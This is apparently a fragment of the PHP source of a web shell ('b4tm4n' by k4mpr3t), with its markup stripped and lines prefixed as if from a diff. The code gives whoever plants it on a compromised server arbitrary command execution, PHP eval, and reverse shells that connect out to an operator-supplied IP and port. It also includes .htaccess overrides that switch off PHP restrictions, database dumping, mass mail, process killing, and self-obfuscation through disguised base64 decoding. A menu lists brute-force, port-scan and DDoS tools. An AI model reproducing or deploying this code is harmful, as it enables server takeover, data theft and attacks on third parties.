    "; + $die[]=$fuck; + $disable++; + } + else + { + if(function_exists($fuck)||is_callable($fuck)) + { + $table.="
    READY
    "; + $ready[]=$fuck; + $enable++; + } + else + { + $table.="
    OFF
    "; + $off[]=$fuck; + $disable++; + } + } + $table.=""; + } + + $risk=($enable/$total)*100; + $secure=($disable/$total)*100; + + printf("

    Sec. Info v2.0.%s


    +

    Risks Rate [%s%%] | Secure Rate [%s%%]



    +
    + + + + + + + + + + %s + +
    No.Disable FunctionStatus
    +
    + Ready List + +
    +
    +
    +
    + Off List + +
    +
    +
    +
    + Die List + +
    +
    +
    ",$total,round($risk,2),round($secure,2),$table,implode($ready, ', '),implode($off, ', '),implode($die, ', ')); + } + if($_REQUEST['x']=="info") + { + printf("
    +
    + +
    +
    +
    +
    "); + + $cores=array('PHP_VERSION','PHP_MAJOR_VERSION','PHP_MINOR_VERSION','PHP_RELEASE_VERSION','PHP_VERSION_ID', + 'PHP_EXTRA_VERSION','PHP_ZTS','PHP_DEBUG','PHP_MAXPATHLEN','PHP_OS','PHP_OS_FAMILY','PHP_SAPI', + 'PHP_EOL','PHP_INT_MAX','PHP_INT_MIN','PHP_INT_SIZE','PHP_FLOAT_DIG','PHP_FLOAT_EPSILON', + 'PHP_FLOAT_MIN','PHP_FLOAT_MAX','DEFAULT_INCLUDE_PATH','PEAR_INSTALL_DIR','PEAR_EXTENSION_DIR', + 'PHP_EXTENSION_DIR','PHP_PREFIX','PHP_BINDIR','PHP_BINARY','PHP_MANDIR','PHP_LIBDIR','PHP_DATADIR', + 'PHP_SYSCONFDIR','PHP_LOCALSTATEDIR','PHP_CONFIG_FILE_PATH','PHP_CONFIG_FILE_SCAN_DIR', + 'PHP_SHLIB_SUFFIX','PHP_FD_SETSIZE'); + + $table=""; + foreach($cores as $core) + { + $table.="".$core."".@constant($core).""; + } + + printf("

    Core Predefined Constants


    + + + + + + + %s +
    Predefined ConstantsValue
    ",$table); + + if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="envirolment") + { + ob_clean(); + phpinfo($_REQUEST['config']); + $phpinfo=ob_get_contents(); + ob_end_clean(); + $phpinfo=preg_replace('%^.*(.*).*$%ms','$1',$phpinfo); + printf("
    %s
    ",$phpinfo); + exit; + } + } + if($_REQUEST['x']=="db") + { + $connect=any("connect",$_SESSION)?$_SESSION['connect']:""; + $status=any("status",$_SESSION)?$_SESSION['status']:""; + $query=any("query",$_REQUEST)?$_REQUEST['query']:"show databases;"; + + if($connect==true) + { + $process=""; + $sql=mysqli_connect($_SESSION['host'],$_SESSION['user'],$_SESSION['pass'],$_SESSION['dbas'],$_SESSION['port']); + /* + $result=mysql_list_processes($sql); + while($row=mysql_fetch_assoc($result)) + { + $process.=sprintf(" + %s%s%s + %s%s", + $row["Id"],$row["Host"],$row["db"], + $row["Command"],$row["Time"]); + } + mysql_free_result($result); + */ + + printf("
    +
    +
    +
    + +
    + + +
    +
    +
    + +
    + +

    +
    +
    + + +
    +
    +
    +
    +
    + ",$query,$process,$dir,$status); + + } + else + { + printf("
    +

    +
    +
    +
    +
    +
    + +
    +
    "); + } + + if(any("rs",$_REQUEST)) + { + $_SESSION[$_REQUEST['rs']]=''; + } + + if(any("cd",$_REQUEST)) + { + $_SESSION['qdb']=$_REQUEST['cd']; + } + + if(any("ct",$_REQUEST)) + { + $_SESSION['qtb']=$_REQUEST['ct']; + } + + if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="db") + { + $cn=mysqli_connect($_REQUEST['host'],$_REQUEST['user'],$_REQUEST['pass'],$_REQUEST['dbas'],$_REQUEST['port']); + + $_SESSION['host']=$_REQUEST['host']; + $_SESSION['port']=$_REQUEST['port']; + $_SESSION['user']=$_REQUEST['user']; + $_SESSION['pass']=$_REQUEST['pass']; + $_SESSION['dbas']=$_REQUEST['dbas']; + + if($cn) + { + $_SESSION['connect']=true; + header('location:'.php_self.'?x=db'); + } + else + { + $_SESSION['connect']=false; + printf("Connection Failed"); + } + } + + if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="qry") + { + $_SESSION['status']=''; + $con=mysqli_connect($_SESSION['host'],$_SESSION['user'],$_SESSION['pass'],$_SESSION['dbas'],$_SESSION['port']); + + if(isset($_REQUEST['disconnect'])) + { + mysqli_close($con); + unset($_SESSION['connect']); + unset($_SESSION['query']); + unset($_SESSION['host']); + unset($_SESSION['user']); + unset($_SESSION['pass']); + unset($_SESSION['dbas']); + unset($_SESSION['qdb']); + unset($_SESSION['qtb']); + header('location:'.php_self.'?x=db'); + } + + $sql=!empty($_REQUEST['query'])?$_REQUEST['query']:"show databases;"; + $result=mysqli_query($con,$sql); + $data=array(); + $name=array(); + + if($result) + { + while($fieldinfo=mysqli_fetch_field($result)) + { + $name[]=$fieldinfo->name; + } + $data[]=$name; + while($row=mysqli_fetch_row($result)) + { + $data[]=$row; + } + mysqli_free_result($result); + } + else + { + $data=false; + } + + if($data!==false) + { + $sqdb=isset($_SESSION['qdb']) ? $_SESSION['qdb'] : ''; + $sqtb=isset($_SESSION['qtb']) ? $_SESSION['qtb'] : ''; + + $bsdb="Database"; + $bqdb=!empty($_SESSION['qdb'])?"→ $sqdb":""; + $bqtb=!empty($_SESSION['qtb'])?"→ $sqtb":""; + + printf("
    +
    %s %s %s
    +
    + ",$bsdb,$bqdb,$bqtb); + + foreach($data as $key => $val) + { + if(is_array($val)) + { + if($key==0) + { + print ""; + foreach($val as $key2 => $val2) + { + if(!is_array($val2)) + { + print ""; + } + } + print ""; + } + else + { + print ""; + foreach($val as $key3 => $val3) + { + if(!is_array($val3)) + { + if(strpos($val2,'Database')!==false) + { + print ""; + } + elseif(strpos($val2,'Tables')!==false) + { + $val4=substr($val2,strpos($val2,'Tables_in_')+10); + print ""; + } + else + { + print ""; + } + } + } + print ""; + } + } + } + print "
    ".$val2."
    $val3$val3$val3
    "; + } + else + { + print 'Query not Executed'; + } + } + + if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="dmp") + { + $database=$_REQUEST['database']; + $output=$_REQUEST['output']; + if (!file_exists($output)&&!empty($database)) + { + $link=mysqli_connect($_SESSION['host'],$_SESSION['user'],$_SESSION['pass'],null,$_SESSION['port']); + mysqli_set_charset($link,'utf8'); + mysqli_select_db($link,$database); + $tables=array(); + $result=mysqli_query($link,'SHOW TABLES'); + while($row=mysqli_fetch_row($result)) + { + $tables[]=$row[0]; + } + $return='SET FOREIGN_KEY_CHECKS=0;' . "\r\n"; + $return.='SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";' . "\r\n"; + $return.='SET AUTOCOMMIT=0;' . "\r\n"; + $return.='START TRANSACTION;' . "\r\n"; + foreach($tables as $table) + { + $result=mysqli_query($link,'SELECT * FROM '.$table); + $num_fields=mysqli_num_fields($result); + $num_rows=mysqli_num_rows($result); + $i_row=0; + $row2=mysqli_fetch_row(mysqli_query($link,'SHOW CREATE TABLE '.$table)); + $return.="\n\n".$row2[1].";\n\n"; + if ($num_rows!==0) { + $row3=@mysqli_fetch_fields($result); + $return.='INSERT INTO '.$table.'( '; + foreach ($row3 as $th) + { + $return.='`'.$th->name.'`,'; + } + $return=substr($return,0,-2); + $return.=' ) VALUES'; + for ($i=0;$i < $num_fields;$i++) + { + while($row=mysqli_fetch_row($result)) + { + $return.="\n("; + for($j=0;$j<$num_fields;$j++) + { + $row[$j]=addslashes($row[$j]); + $row[$j]=preg_replace("#\n#","\\n",$row[$j]); + if (isset($row[$j])) { $return.='"'.$row[$j].'"';}else { $return.='""';} + if ($j<($num_fields-1)) { $return.=',';} + } + if (++$i_row==$num_rows) { + $return.=");"; + }else { + $return.="),"; + } + } + } + } + $return.="\n\n\n"; + } + $return .='SET FOREIGN_KEY_CHECKS=1;' . "\r\n"; + $return.='COMMIT;'; + $output=pathinfo($otput)['extension']=='sql'?$output:$output.'.sql'; + $handle=fopen($output,'w+'); + fwrite($handle,$return); + fclose($handle); + $_SESSION['status']=sprintf("Dump with success... 
'%s'",urle($output),basename($output)); + } + else + { + $_SESSION['status']="Dump Error"; + } + + header('location:'.php_self.'?x=db'); + } + + } + if($_REQUEST['x']=="terminal") + { + printf(" +
    + +
    + + +
    +
    ",Execute('whoami'),$dir); + + if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="terminals") + { + ob_clean(); + $command=!empty($_REQUEST['cmd'])?$_REQUEST['cmd']:"whoami"; + @chdir($dir); + $charset='UTF-8'; + if(!Unix()) + { + $charset='Windows-1251'; + } + $ret=iconv($charset,'UTF-8',Execute($command)); + print $ret; + exit; + } + elseif(any("xa",$_REQUEST)&&$_REQUEST['xa']=="terminals-curdir") + { + ob_clean(); + $command=!empty($_REQUEST['cmd'])?$_REQUEST['cmd']:"whoami"; + if (preg_match('/cd (.*)/',$command,$dirx)) + { + if ($dirx[1]=='..') + { + $dir=substr($dir,0,strrpos($dir,_)); + if (strlen($dir)<=2) $dir=$dir._; + } + else + { + if (is_dir($dirx[1])) + { + $dir=realpath($dirx[1]); + } + } + } + $_SESSION['c']=urle($dir); + print '$ '.$dir.':'; + exit; + } + } + if($_REQUEST['x']=="connect") + { + printf("
    +
    +
    +
    + Reverse Connect +
    +
    +
    +
    + +
    +
    +
    +
    +
    +
    +
    + Status +
    Terminal: %s", + remote_addr,Execute('whoami') + ); + + if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="reverse-connect") + { + if($_REQUEST['socket']=="fsockopen") + { + $host=$_REQUEST['reverse-ip']; + $port=$_REQUEST['reverse-port']; + $sock=@fsockopen($host,$port,$errno,$errstr); + if($errno!=0) + { + printf("%s:%s",$errno,$errstr); + } + else + { + while(!feof($sock)) + { + fwrite($sock,"[b4tm4n]:"); + $command=fgets($sock,1024); + if(trim($command)=='quit'||trim($command)=='exit') + { + fclose($sock); + printf($command); + exit; + } + fwrite($sock,Execute($command)); + } + fclose($sock); + } + } + else if($_REQUEST['socket']=="socket_create") + { + $host=$_REQUEST['reverse-ip']; + $port=$_REQUEST['reverse-port']; + $sock=socket_create(AF_INET,SOCK_STREAM,SOL_TCP); + socket_set_nonblock($sock); + if(!$sock) + { + printf("Connection Error"); + } + else + { + while(!@socket_connect($sock,$host,$port)) + { + @socket_write($sock,"[b4tm4n]:",strlen ("[b4tm4n]:")); + $input=@socket_read($sock,1024,PHP_NORMAL_READ); + if (trim($input)=='quit'||trim($input)=='exit') + { + socket_set_block($sock); + socket_close($sock); + printf($input); + exit; + } + @socket_write($sock,Execute($input),strlen (Execute($input))); + } + socket_set_block($sock); + socket_close($sock); + } + } + else if($_REQUEST['socket']=="stream_socket_client") + { + $host=$_REQUEST['reverse-ip']; + $port=$_REQUEST['reverse-port']; + $sock=@stream_socket_client("tcp://$host:$port",$errno,$errstr); + if (!$sock) + { + printf("%s:%s",$errno,$errstr); + } + else + { + while(!feof($sock)) + { + fwrite($sock,"[b4tm4n]:"); + $command=fgets($sock,1024); + if(trim($command)=='quit'||trim($command)=='exit') + { + fclose($sock); + printf($command); + exit; + } + fwrite($sock,Execute($command)); + } + fclose($sock); + } + } + } + printf("
    "); + } + if($_REQUEST['x']=="htaccess") + { + $php_ini=array( + "php_value upload_max_filesize 32M", + "php_value post_max_size 32M", + "php_flag safe_mode Off", + "php_value disable_functions null", + "php_flag safe_mode_gid Off", + "php_value open_basedir $dir", + "php_flag register_globals On", + "php_flag exec On", + "php_flag shell_exec On"); + + $htaccess=array( + "Options All", + "Allow From All", + "Satisfy Any"); + + printf(" +
    +
    + +
    +
    + +
    +
    ",implode($php_ini,"\n"),implode($htaccess,"\n")); + } + if($_REQUEST['x']=="php") + { + $exp=array( + "print_r(get_extension_funcs('Core'));", + "print_r(get_loaded_extensions());", + "print_r(ini_get_all('pcre'));", + "print_r(ini_get_all());", + "print_r(get_defined_constants());", + "print_r(get_defined_functions());", + "print_r(get_declared_classes());"); + + printf("
    +
    +
    + +
    +
    + +
    + + +
    +
    ",implode($exp,"\n")); + + if(any("code",$_REQUEST)) + { + ob_clean(); + $code=trim($_REQUEST['code']); + $evil=Evil($code); + exit; + } + if(any("codex",$_REQUEST)) + { + ob_clean(); + $code=trim($_REQUEST['codex']); + $evil=Evil($code,true); + exit; + } + } + if($_REQUEST['x']=="perl") + { + print 'PHP Perl Class: '.(class_exists('Perl')?"ON":"OFF").'
    '; + + if(Unix()) + { + if(file_exists("/usr/bin/perl")) + { + $path_perl="/usr/bin/perl"; + } + else + { + $path_perl="/usr/bin/env perl"; + } + } + else + { + if(file_exists("C:\\perl\bin\perl.exe")) + { + $path_perl="C:\\perl\bin\perl.exe"; + } + elseif(file_exists("C:\\wamp\bin\perl.exe")) + { + $path_perl="C:\\wamp\bin\perl.exe"; + } + elseif(file_exists("C:\\xampp\perl\bin\perl.exe")) + { + $path_perl="C:\\xampp\perl\bin\perl.exe"; + } + } + + $script=array( + "#!$path_perl", + "use strict;", + "use warnings;", + "use CGI;", + "print CGI::header();", + "print 'k4mpr3t on CGI';"); + + $htaccess=array( + "Options +ExecCGI +SymLinksIfOwnerMatch", + "DirectoryIndex index.ler", + "AddType application/x-httpd-cgi .ler", + "AddHandler cgi-script .ler"); + + $path=$dir._.'cgi-bin'; + $file=$path._.'perl.ler'; + $file2=$path._.'.htaccess'; + + $scripts=implode($script,"\n"); + $htaccesss=implode($htaccess,"\n"); + + if(!is_dir($path)) + { + mkdir($path,0755); + } + if(!is_file($file)) + { + $op=fopen($file,'w+'); + fwrite($op,$scripts); + fclose($op); + chmod($file,0755); + } + if(!is_file($file2)) + { + $op=fopen($file2,'w+'); + fwrite($op,$htaccesss); + fclose($op); + chmod($file2,0755); + } + + $redirect=GetUrlFromPath($file); + printf("Tested -> Link"); + + if (class_exists('Perl')) + { + //$perl=Perl::getInstance(); + $perl=new Perl(); + $perl->eval("print \"Executing Perl code in PHP\n\""); + print "Hello from PHP! "; + + //$perl=new Perl(); + $perl->require($file); + $val=$perl->somePhpFunc('test'); + print $val; + } + } + if($_REQUEST['x']=="mail") + { + printf(" + +
    +
    +
    + Mail +
    +
    +
    +
    +
    +
    +
    +
    +
    + +
    +
    +
    +
    +
    + Result's +
    +
    +
    +
    + + ",php_self); + + if(any('xa',$_REQUEST)&&$_REQUEST['xa']=='send') + { + ob_clean(); + $from=$_REQUEST['from']; + $reply=$_REQUEST['reply']; + $to=$_REQUEST['to']; + $cc=$_REQUEST['cc']; + $bcc=$_REQUEST['bcc']; + $subject=$_REQUEST['subject']; + $msg=$_REQUEST['message']; + $attachment=$_REQUEST['attachment']; + $uid=md5(uniqid(time())); + + $headers[]="From: $from"; + $headers[]="Reply-To: $reply"; + $headers[]="To: $to"; + if(!empty($cc)) $headers[]='Cc: $cc'; + if(!empty($bcc)) $headers[]='Bcc: $bcc'; + $headers[]="MIME-Version: 1.0"; + $headers[]="Content-Type: multipart/mixed; boundary=\"$uid\""; + + $messages[]="--$uid"; + $messages[]="Content-type: text/html; charset=\"iso-8859-1\""; + $messages[]="Content-Transfer-Encoding: 8bit"; + $messages[]=""; + $messages[]="$msg"; + $messages[]=""; + + if(is_file($attachment)) + { + $content=file_get_contents($attachment); + $content=chunk_split(B64E($content)); + $name=basename($attachment); + $mime=mime_content_type($attachment); + + $messages[]="--$uid"; + $messages[]="Content-Type: $mime; name=\"$name\""; + $messages[]="Content-Transfer-Encoding: base64"; + $messages[]="Content-Disposition: attachment"; + $messages[]=""; + $messages[]="$content"; + $messages[]=""; + $messages[]="--$uid--"; + } + + $message=implode("\r\n",$messages); + $header=implode("\r\n",$headers); + + if(mail($to,$subject,$message,$header)) + { + print "Email Send"; + } + else + { + $error=error_get_last(); + print "Error :" . $error['message']; + } + exit; + } + } + if($_REQUEST['x']=='process') + { + printf("
    + +
    + + +
    "); + + if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="kill") + { + $pid=$_REQUEST['pid']; + $name=$_REQUEST['name']; + + if(Unix()) + { + $kill=Execute("kill 9 $pid"); + $kill=Execute("kill 9 $name"); + if($kill) print 'Process Killed'; + } + else + { + $kill=Execute("taskkill /f /pid $pid"); + $kill=Execute("taskkill /f /im $name"); + if($kill) print 'Process Killed'; + } + } + + if(Unix()) + { + $ret=iconv('UTF-8','UTF-8',Execute('ps aux')); + print '
    '.$ret.'
    '; + } + else + { + $ret=iconv('Windows-1251','UTF-8',Execute('tasklist')); + print '
    '.$ret.'
    '; + } + } + if($_REQUEST['x']=='shells') + { + print "Coming Soon"; + } + if($_REQUEST['x']=='symlink') + { + print "Coming Soon"; + } + if($_REQUEST['x']=="account") + { + printf("
    +
    +
    + +
    ",B64D($account[0])); + + if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="change") + { + $filename=script_filename; + $username=$_REQUEST['change-password']; + $password=$_REQUEST['change-username']; + + if (!empty($username)&&!empty($password)) + { + $user_from=$account[0]; + $user_to=B64E($password); + $content=file_get_contents($filename); + $chunk=explode($user_from,$content); + $content=implode($user_to,$chunk); + $change=file_put_contents($filename,$content); + + $pass_from=$account[1]; + $pass_to=sha1(md5($username)); + $content=file_get_contents($filename); + $chunk=explode($pass_from,$content); + $content=implode($pass_to,$chunk); + $change=file_put_contents($filename,$content); + + if($change) + { + session_destroy(); + session_regenerate_id(); + header('location:'.php_self); + } + else + { + printf("Error change account"); + } + } + else + { + printf("Mistakes !"); + } + } + } + if($_REQUEST['x']=="action") + { + $files=any('chk',$_REQUEST)?$_REQUEST['chk']:array(); + $value=any('action-value',$_REQUEST)?$_REQUEST['action-value']:$_REQUEST['action-option']; + $tmp=""; + $row=""; + $count_dirs=0; + $count_files=0; + + foreach($files as $file) + { + if(is_dir(urld($file))) + { + $count_dirs++; + } + if(is_file(urld($file))) + { + $count_files++; + } + + $row.="".urld($file).""; + $tmp.=urld($file).","; + } + + if(count($files)==1&&$value=='copy') + { + header('location:'.php_self.'?a=cp&r='.$files[0]); + } + + if(count($files)==1&&$value=='move') + { + header('location:'.php_self.'?a=mv&r='.$files[0]); + } + + if(!any('xa',$_REQUEST)&&$value=='delete') + { + printf("

    Dir's: [%s] File's: [%s]

    + %s
    +
    + + + +
    ", + $count_dirs, + $count_files, + $row, + $value, + $tmp); + } + + if(!any('xa',$_REQUEST)&&$value!='delete') + { + printf("

    Dir's: [%s] File's: [%s]

    + %s
    +
    + + + -> + + + +
    ", + $count_dirs, + $count_files, + $row, + $value, + $tmp, + $dir._); + } + + if(any('xa',$_REQUEST)&&$_REQUEST['xa']=='option') + { + $files=array_filter(explode(',',$_REQUEST['tmp'])); + $newloc=trim(@$_REQUEST['newloc']); + $succ=0; + $fail=0; + + if($_REQUEST['action-option']=='copy') + { + if(file_exists($newloc)&&is_dir($newloc)) + { + foreach($files as $file) + { + if(CopyRecursive($file,rtrim($newloc,_)._.basename($file))) + { + $succ++; + } + else + { + $fail++; + } + } + print "Success: $succ | Failed: $fail"; + } + else + { + print "Target not exists !"; + } + } + + if($_REQUEST['action-option']=='move') + { + if(file_exists($newloc)&&is_dir($newloc)) + { + foreach($files as $file) + { + if(MoveRecursive($file,rtrim($newloc,_)._.basename($file))) + { + $succ++; + } + else + { + $fail++; + } + } + print "Success: $succ | Failed: $fail"; + } + else + { + print "Target not exists !"; + } + } + + if($_REQUEST['action-option']=='delete') + { + foreach($files as $file) + { + if(Remove($file)) + { + $succ++; + } + else + { + $fail++; + } + } + print "Success: $succ | Failed: $fail"; + } + + if($_REQUEST['action-option']=='zip') + { + if(pathinfo($newloc)['extension']=='zip') + { + $zip=new ZipArchive; + + if ($zip->open($newloc,ZipArchive::CREATE|ZipArchive::OVERWRITE)===TRUE) + { + foreach($files as $file) + { + if(is_dir($file)) + { + $zip->addEmptyDir(basename($file)); + + $recur=new RecursiveIteratorIterator( + new RecursiveDirectoryIterator($file), + RecursiveIteratorIterator::LEAVES_ONLY + ); + + foreach ($recur as $key => $val) + { + if(basename($key)!="..") + { + if(is_dir($key)) + { + $zdir=str_replace($file,basename($file),realpath($key)); + $zip->addEmptyDir($zdir); + } + elseif(is_file($key)) + { + $zfile=str_replace($file,basename($file),realpath($key)); + $zip->addFile(realpath($key),$zfile); + } + } + } + } + elseif(is_file($file)) + { + $zip->addFile($file,basename($file)); + } + } + + $zip->close(); + print 'Zip Created'; + } + else + { + 
print 'Failed'; + } + } + else + { + print 'Extension must Zip'; + } + } + + if($_REQUEST['action-option']=='unzip') + { + if(file_exists($newloc)&&is_dir($newloc)) + { + foreach($files as $file) + { + if(pathinfo($newloc)['extension']=='zip') + { + $zip=new ZipArchive; + + if ($zip->open($file)===TRUE) + { + $zip->extractTo($newloc); + $zip->close(); + $succ++; + } + else + { + $fail++; + } + } + else + { + $fail++; + } + + } + print "Success: $succ | Failed: $fail"; + } + else + { + print "Target not exists !"; + } + } + } + } + if($_REQUEST['x']=="find") + { + $recur=new RecursiveIteratorIterator( + new RecursiveDirectoryIterator($dir), + RecursiveIteratorIterator::LEAVES_ONLY + ); + + if(any('find-value',$_REQUEST)&&!empty($_REQUEST['find-value'])) + { + $result=""; + $res_=0; + + foreach ($recur as $key => $val) + { + if(basename($key)!="..") + { + if(strpos(realpath($key),$_REQUEST['find-value'])!== false) + { + $result.=sprintf(" + + %s + %s +
    %s
    + ", + substr(realpath($key),0,strrpos(realpath($key),_)), + substr(realpath($key),0,strrpos(realpath($key),_)), + substr(realpath($key),0,strrpos(realpath($key),_)), + realpath($key), + realpath($key), + basename(realpath($key)), + GetFileTime(realpath($key),'modify') + ); + + $res_++; + } + } + } + + printf(" +
    + + +
    +
    + + + + + + + + + %s +
    No.DirectoryNameModified
    +
    ",$_REQUEST['find-value'],$_REQUEST['find-value'],$res_,$result); + } + else + { + print "
    + + +
    "; + } + } + if($_REQUEST['x']=="update") + { + $link_update='https://raw.githubusercontent.com/k4mpr3t/b4tm4n/master/bat.php'; + $current_version=2.7; //New Version Released + + if($config['debug']==true) + { + $latest_version=$current_version+0.1; //Test Update latest version -/+ 0.1 + } + else + { + $git_script=GetUrlContent($link_update); + $get_version=strpos($git_script,"current_version"); + $version=substr($git_script,$get_version+16,3); + $latest_version=is_numeric($version)?$version:$current_version; + } + + $status=""; + if((float)$latest_version>(float)$current_version) + { + if($config['debug']==true) + { + $status.='New Version Available '.$latest_version.'
    Setting Debug to False for Activate this Feature'; + } + else + { + $status.='New Version Available '.$latest_version.'
    Download -> [link]'; + } + } + else + { + $status.='Latest Version '.$current_version; + } + + Printf("
    + + +

    %s +
    ",$status); + } + if($_REQUEST['x']=="self-encryptor") + { + if($php_script=htmlentities(@file_get_contents(__FILE__))) + { + $asu=strpos($php_script,$_SESSION["action"]["password"]); + $temp=substr($php_script,$asu+48); + $rand="\$".substr(str_shuffle("abcdefghijklmnopqrstuvwxyz"),0,rand(1,3)); + $rand2="\$".substr(str_shuffle("abcdefghijklmnopqrstuvwxyz"),0,rand(2,5)); + $_a="b";$_b="a";$_c="s";$_d="e";$_e="6";$_f="4"; + $_g="_";$_h="e";$_i="n";$_j="c";$_k="o";$_l="d";$_m="e"; + $b64e=$_a.$_b.$_c.$_d.$_e.$_f.$_g.$_h.$_i.$_j.$_k.$_l.$_m; + $b64d=$_a.$_b.$_c.$_d.$_e.$_f.$_g.$_l.$_m.$_j.$_k.$_l.$_m; + $b64=array( + '"\142\141\163\x65\66\x34\137\x64\x65\x63\157\144\145"', + 'strrev("ed"."oce"."d_4"."6es"."ab")', + 'strrev("e"."doc"."ed_"."46e"."sab")', + '"b"."as"."e6"."4_"."d"."ec"."o"."de"', + '"ba"."se"."6"."4_d"."e"."cod"."e"' + ); + $rand_b64=array_rand($b64); + $rand3=$b64[$rand_b64]; + $var1=$rand.'="'.$_SESSION["action"]["username"].':'.$_SESSION["action"]["password"].'";'; + $var2=$rand2.'='.$rand3.';'; + $var=array( + $var1.$var2, + $var2.$var1 + ); + $rand_var=array_rand($var); + $rand4=$var[$rand_var]; + $self=preg_replace("/\\\$x_/",$rand,$temp); // Change Variable $x_ to Random + $src_=''; + $src_.=''; + $name=!empty($_REQUEST['name'])?$_REQUEST['name']:'bat_encrypt.php'; + $file=dirname(__FILE__)._.$name; + $op=fopen($file,'w+'); + fwrite($op,$src_); + fclose($op); + printf("
    SELF ENCRYPT CREATED !!!
    +
    + Link -> %s +
    ",GetUrlFromPath($file),$name); + } + else + { + print "
    SELF ENCRYPT ENABLE !!!
    "; + } + } +} + +/* START CUSTOM TOOLZ */ +if(any("z",$_REQUEST)) +{ + $z=$_REQUEST['z']; + + print MenuTools(array( + "target-map"=>array("title"=>"Target Map","ver"=>"2.0","auth"=>"k4mpr3t"), + "port-scanner"=>array("title"=>"Scan Port","ver"=>"1.0","auth"=>"k4mpr3t"), + "script-loader"=>array("title"=>"Script Loader","ver"=>"1.0","auth"=>"k4mpr3t"), + "encryptor"=>array("title"=>"Encryptor","ver"=>"1.1","auth"=>"k4mpr3t"), + "form-bruteforces"=>array("title"=>"Form Bruteforces","ver"=>"1.0","auth"=>"k4mpr3t"), + "login-bruteforces"=>array("title"=>"Login Bruteforces","ver"=>"1.0","auth"=>"k4mpr3t"), + "mass-tools"=>array("title"=>"Mass Tools","ver"=>"1.0","auth"=>"k4mpr3t"), + "ddos-attack"=>array("title"=>"DDOS Attack","ver"=>"2.0","auth"=>"k4mpr3t"), + )); + + print "
    "; + + if(empty($z)) + { + printf("
    +

    Nothing Is Secure...

    +

    WHY SO serious ?!

    +
    "); + } + if($z=="target-map") + { + print "
    +

    ".$menu_tools[$z]['title']." v".$menu_tools[$z]['ver']."

    +

    by: ".$menu_tools[$z]['auth']."

    +
    "; + + printf("
    +
    + +
    +
    +
    +
    ",gethostbyname(http_host)); + + if(any("ip",$_REQUEST)) + { + ob_clean(); + $ip=!empty($_REQUEST['ip']) ? $_REQUEST['ip'] : gethostbyname(http_host); + $valid=filter_var($ip,FILTER_VALIDATE_IP) or die('Invalid IP Address'); + if($_REQUEST['ip']==gethostbyname(http_host)) + { + $url=B64D("zSI9xWleO7odODUdzH4qy79ezmMeyr1="); + $geoip=GetUrlContent($url); + $json=json_decode($geoip,true); + } + else + { + $url=sprintf(B64D("zSI9xWleO7odODUdzH4qy79ezmMeyr1=")."%s",$ip); + $geoip=GetUrlContent($url); + $json=json_decode($geoip,true); + } + $url=sprintf(B64D("zSI9xSN3Ob0gBCYaOnwey7whAH4kwX0gBCYa")."?q=%s,%s&z=10&output=embed",$json['lat'],$json['lon']); + printf("
    +
    + + + + + + + + +
    AS%s
    City%s
    Country%s
    Country Code%s
    ISP%s
    Latitude%s
    Logitude%s
    +
    +
    + + + + + + + + +
    Origin%s
    IP%s
    Region%s
    Region Name%s
    Timezone%s
    Zip%s
    Status%s
    +
    +
    +